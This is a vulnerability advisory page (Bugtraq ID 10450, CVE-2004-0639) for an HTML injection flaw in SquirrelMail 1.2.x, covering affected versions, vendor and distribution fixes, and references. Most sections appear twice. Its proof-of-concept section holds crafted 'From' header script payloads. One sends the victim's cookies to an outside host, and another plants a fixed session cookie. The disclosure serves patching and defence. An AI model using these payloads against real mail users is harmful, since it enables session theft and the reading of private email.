SquirrelMail From Email Header HTML Injection Vulnerability
BID:10450
Info
SquirrelMail From Email Header HTML Injection Vulnerability
| Bugtraq ID: | 10450 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-0639 |
| Remote: | Yes |
| Local: | No |
| Published: | May 03 2004 12:00AM |
| Updated: | Jul 12 2009 05:16AM |
| Credit: | This issue was discovered by the vendor. |
| Vulnerable: |
SquirrelMail SquirrelMail 1.2.6 SquirrelMail SquirrelMail 1.2.5 SquirrelMail SquirrelMail 1.2.4 SquirrelMail SquirrelMail 1.2.3 SquirrelMail SquirrelMail 1.2.2 SquirrelMail SquirrelMail 1.2.1 SquirrelMail SquirrelMail 1.2 .0 |
| Not Vulnerable: |
SquirrelMail SquirrelMail 1.4.8 SquirrelMail SquirrelMail 1.4.3 RC1 SquirrelMail SquirrelMail 1.4.2 SquirrelMail SquirrelMail 1.4.1 SquirrelMail SquirrelMail 1.4 SquirrelMail SquirrelMail 1.2.11 SquirrelMail SquirrelMail 1.2.10 SquirrelMail SquirrelMail 1.2.9 SquirrelMail SquirrelMail 1.2.8 SquirrelMail SquirrelMail 1.2.7 |
Discussion
SquirrelMail From Email Header HTML Injection Vulnerability
SquirrelMail is reported to be prone to a 'from' field email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings.
An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials; disclosure of personal email is possible. Other attacks are also possible.
SquirrelMail is reported to be prone to a 'from' field email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings.
An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials; disclosure of personal email is possible. Other attacks are also possible.
Exploit / POC
SquirrelMail From Email Header HTML Injection Vulnerability
No exploit is required to leverage this issue. The following 'from' field proof of concepts have been provided:
From:<!--<>(-->John Doe<script>window.alert(document.cookie);</script><>
From:(<!--(--><script>document.location='http://www.rs-labs.com/?'+document.cookie;</script><>
From:<!--<>(-->John Doe<script>document.cookie='PHPSESSID=xxx;path=/';</script><>
No exploit is required to leverage this issue. The following 'from' field proof of concepts have been provided:
From:<!--<>(-->John Doe<script>window.alert(document.cookie);</script><>
From:(<!--(--><script>document.location='http://www.rs-labs.com/?'+document.cookie;</script><>
From:<!--<>(-->John Doe<script>document.cookie='PHPSESSID=xxx;path=/';</script><>
Solution / Fix
SquirrelMail From Email Header HTML Injection Vulnerability
Solution:
Debian has released security advisory DSA 535-1 with fixes to address this issue.
The vendor has released upgrades dealing with this issue.
Conectiva has released a security advisory (CLA-2004:858) to address multiple issues in squirrelmail. Please see the referenced advisory for more information.
SquirrelMail SquirrelMail 1.2 .0
SquirrelMail SquirrelMail 1.2.1
SquirrelMail SquirrelMail 1.2.2
SquirrelMail SquirrelMail 1.2.3
SquirrelMail SquirrelMail 1.2.4
SquirrelMail SquirrelMail 1.2.5
SquirrelMail SquirrelMail 1.2.6
Solution:
Debian has released security advisory DSA 535-1 with fixes to address this issue.
The vendor has released upgrades dealing with this issue.
Conectiva has released a security advisory (CLA-2004:858) to address multiple issues in squirrelmail. Please see the referenced advisory for more information.
SquirrelMail SquirrelMail 1.2 .0
-
SquirrelMail squirrelmail-1.4.3.tar.gz
http://www.squirrelmail.org/download.php
SquirrelMail SquirrelMail 1.2.1
-
SquirrelMail squirrelmail-1.4.3.tar.gz
http://www.squirrelmail.org/download.php
SquirrelMail SquirrelMail 1.2.2
-
SquirrelMail squirrelmail-1.4.3.tar.gz
http://www.squirrelmail.org/download.php
SquirrelMail SquirrelMail 1.2.3
-
SquirrelMail squirrelmail-1.4.3.tar.gz
http://www.squirrelmail.org/download.php
SquirrelMail SquirrelMail 1.2.4
-
SquirrelMail squirrelmail-1.4.3.tar.gz
http://www.squirrelmail.org/download.php
SquirrelMail SquirrelMail 1.2.5
-
SquirrelMail squirrelmail-1.4.3.tar.gz
http://www.squirrelmail.org/download.php
SquirrelMail SquirrelMail 1.2.6
-
Conectiva squirrelmail-1.4.3a-13677U90_1cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/squirrelmail-1.4.3a-13677U9 0_1cl.noarch.rpm -
Conectiva squirrelmail-doc-1.4.3a-13677U90_1cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/squirrelmail-doc-1.4.3a-136 77U90_1cl.noarch.rpm -
Debian squirrelmail_1.2.6-1.4_all.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelma il_1.2.6-1.4_all.deb -
SquirrelMail squirrelmail-1.4.3.tar.gz
http://www.squirrelmail.org/download.php
References
SquirrelMail From Email Header HTML Injection Vulnerability
References:
References:
- XMB Homepage (XMB)
- [Full-Disclosure] RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability (Roman Medina
)